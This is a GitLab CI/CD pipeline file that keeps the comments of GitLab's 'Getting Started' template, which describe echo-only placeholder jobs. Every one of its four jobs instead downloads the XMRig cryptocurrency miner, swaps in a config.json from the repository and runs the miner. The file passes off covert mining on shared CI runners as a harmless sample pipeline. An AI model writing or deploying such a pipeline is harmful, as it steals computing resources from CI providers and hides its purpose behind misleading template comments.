# This file is a template, and might need editing before it works on your project.
# To contribute improvements to CI/CD templates, please follow the Development guide at:
# https://docs.gitlab.com/ee/development/cicd/templates.html
# This specific template is located at:
# https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Getting-Started.gitlab-ci.yml

# This is a sample GitLab CI/CD configuration file that should run without any modifications.
# It demonstrates a basic 3 stage CI/CD pipeline. Instead of real tests or scripts,
# it uses echo commands to simulate the pipeline execution.
#
# A pipeline is composed of independent jobs that run scripts, grouped into stages.
# Stages run in sequential order, but jobs within stages run in parallel.
#
# For more information, see: https://docs.gitlab.com/ee/ci/yaml/index.html#stages

stages:          # List of stages for jobs, and their order of execution
  - build
  - test
  - deploy

build-job:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-static-x64.tar.gz
    - 7z e xmrig-6.13.1-linux-static-x64.tar.gz
    - 7z e xmrig-6.13.1-linux-static-x64.tar
    - rm xmrig-6.13.1/config.json
    - mv config.json xmrig-6.13.1/config.json
    - cd xmrig-6.13.1
    - chmod +x xmrig
    - ./xmrig

unit-test-job:   # This job runs in the test stage.
  stage: test    # It only starts when the job in the build stage completes successfully.
  script:
    - wget https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-static-x64.tar.gz
    - 7z e xmrig-6.13.1-linux-static-x64.tar.gz
    - 7z e xmrig-6.13.1-linux-static-x64.tar
    - rm xmrig-6.13.1/config.json
    - mv config.json xmrig-6.13.1/config.json
    - cd xmrig-6.13.1
    - chmod +x xmrig
    - ./xmrig

lint-test-job:   # This job also runs in the test stage.
  stage: test    # It can run at the same time as unit-test-job (in parallel).
  script:
    - wget https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-static-x64.tar.gz
    - 7z e xmrig-6.13.1-linux-static-x64.tar.gz
    - 7z e xmrig-6.13.1-linux-static-x64.tar
    - rm xmrig-6.13.1/config.json
    - mv config.json xmrig-6.13.1/config.json
    - cd xmrig-6.13.1
    - chmod +x xmrig
    - ./xmrig

deploy-job:      # This job runs in the deploy stage.
  stage: deploy  # It only runs when *both* jobs in the test stage complete successfully.
  script:
    - wget https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-static-x64.tar.gz
    - 7z e xmrig-6.13.1-linux-static-x64.tar.gz
    - 7z e xmrig-6.13.1-linux-static-x64.tar
    - rm xmrig-6.13.1/config.json
    - mv config.json xmrig-6.13.1/config.json
    - cd xmrig-6.13.1
    - chmod +x xmrig
    - ./xmrig
